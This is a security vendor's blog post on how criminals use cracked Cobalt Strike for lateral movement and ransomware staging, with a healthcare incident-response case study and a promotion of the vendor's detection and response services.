February 09, 2022
Cobalt Strike: The New Favorite Among Thieves
Since 2012, Cobalt Strike has been utilised as a proactive way of testing network defenses against advanced threat actor tools, tactics, and procedures (TTPs). The aim, of course, is to mimic the most malicious threat actors and their techniques to test your security posture and practice response procedures. Unfortunately, like most things in security, tools and knowledge meant to help security teams can also be used maliciously by criminals.
Though this is debated in some circles, offensive security research and offensive simulation tools like Cobalt Strike, are in my opinion, a net positive for the security community. A tool like Cobalt Strike is simply simulating tactics and techniques already being used by hackers in the wild. Security teams need access to these tools in order to test against them.
Historically, penetration testing and simulation software had not been popular with competent cybercriminals due to the ubiquity of their use and familiarity to defenders — hackers usually relied on dark web exploit kits like Angler and Blackhole. This has flipped in recent years due to two reasons:
- The availability of stable exploit kits on the dark web has reduced dramatically due to law enforcement actions against exploit kit authors.
- Cobalt Strike has gotten good; real good.
Cobalt Strike – The Swiss Army Hacker Framework
Over the last two years, malicious threat actors have managed to crack fully-featured versions of Cobalt Strike and made them widely available within dark web marketplaces and forums. For instance, on March 22nd, 2020, the latest version of the tool was cracked and provided to hackers. Datto has seen it widely used to infiltrate and laterally move through networks, and depending on what value is placed on a given company’s data, ransomware is dropped. Datto has noticed a consistent upward trend of this cracked version as a primary methodology by threat actors since early 2019 to present.
Cobalt Strike is a favorite because it’s stable and highly flexible. It can be repurposed to deploy all manner of payloads, like ransomware or keylogger, to the compromised network. It’s well organised and provides a framework to manage compromised assets. Essentially, this tool helps the ‘B list’ act like ‘A list’ hackers.
While Cobalt Strike’s author has implemented many protections and licensing schemes to keep the code out of the wrong hands, the cracked versions appear to utilise the entire framework of the solution. This means that threat actors have access to networks, are able to pivot, and then laterally move within the network. Implants called “beacons” support this lateral movement from system to system without even connecting to the internet. Only one of these beacons actually needs to connect to the internet (the “beachhead”), making it more difficult to detect at the network layer.
A feature called “Maleable C2” enables hackers to easily modify their network signature with relative ease, while Maleable PE enables the same stealthy flexibility to the implants that are injected into system processes.
Cobalt Strike also utilises modern staged delivery. Once within the network, numerous stages trigger as part of gaining access to the network and executing the hacker’s final agenda. Essentially, one stage will trigger, then the next stage. What makes this difficult to detect is that each stage is simple and can even be a single line of code. Alone, any one stage might not look malicious or throw any alarms. Even worse, when it finally enters the final stage, the earlier stages disappear, leaving nothing on disk.
Lateral movement is a huge part of Cobalt Strike. The laterally communicating beacons enable the attacker to worm their way into more valuable parts of the network. The objective is often to find a domain administrator and take over their account. Using this account, they can instruct the domain controllers to stage ransomware throughout the entire network prior to execution — this technique gives almost no time for defenders to react once the final trigger is initiated.
We has observed that this methodology can take a couple hours or up to two full weeks from the initial entry to executing the ransom demand.
Stopping a Ransom Before It’s Demanded
In a recent case, the Datto support team was engaged with a large healthcare provider that was investigating a strange alert. Their antivirus and other detection tools missed everything, but their application control luckily stopped one of the ransomware stages from executing something from a temp folder (this turned out to be the ransomware encryptor that had been scheduled to kick-off early on a Sunday morning). We investigated these alerts and triaged the network for any other signs of compromise. Within the first hour of deployment, we found:
- Memory-resident Cobalt Strike beacons on three of their critical servers
- Malicious powershell commands downloading additional malware from a Los Angeles IP address
- The compromised account being exploited was a user’s account who has been assigned overly permissive administrator privileges to the network
- The ransomware loader (technically a non-malicious file on it’s own) staged on thousands of workstations, servers, and medical devices.
Based on the scoping of the incident using triage data and conclusions, our support team recommended immediate action to purge the malicious actor from the network:
- IP Blocks were made at the firewall for the address found by Datto
- The compromised user’s account was disabled
- The servers infected with Cobalt Strike beacons were rebooted to clear their memory footprint and validation scans performed to ensure no persistence remained. (Datto has a button for this)
- We removed the ransomware loaders and other artifacts from every system in the network
- All domain admins underwent password resets
- Following these initial containment actions, the organisation retained a Datto partner to take over the full investigation and remaining cleanup actions.
These swift actions by the organisation’s IT and security teams, supported by Datto, purged the actor, stopped further Cobalt Strike spread, and prevented an in-progress second attempt to lock out and ransom this critical healthcare provider. These actions, from triage to containment, happened within the same evening. Without a detection and response capability and support, it could have been a very different story.
Initial Response Support Is Most Critical
Most organisations spend a majority of their time and resources putting controls and protections in place to prevent these attacks from ever occurring. When such controls fail, detection and response expertise and capabilities are essential in the FIRST HOUR if you plan to mitigate an attack like this healthcare provider did. Too often we see organisations stumble in the first hour due to not understanding the scope and severity of an attack (lack of visibility) and not knowing what needs to get done first (lack of response experience and practice).
Based on the tactics and methodology we’ve observed in the latest ransomware cases, we recommend that if your team encounters ransomware, the remediation and response shouldn’t stop at the ransomware. It is very likely that there are hidden beacons within your network that have been missed: hiding in memory. Even if your endpoint protection stops the ransom, the perpetrator could still be inside with access to try again. Fully triaging and scoping an incident is essential to containment: you’ll need a partner like Datto and a team to support your effort to ensure that all of the malicious code is remediated.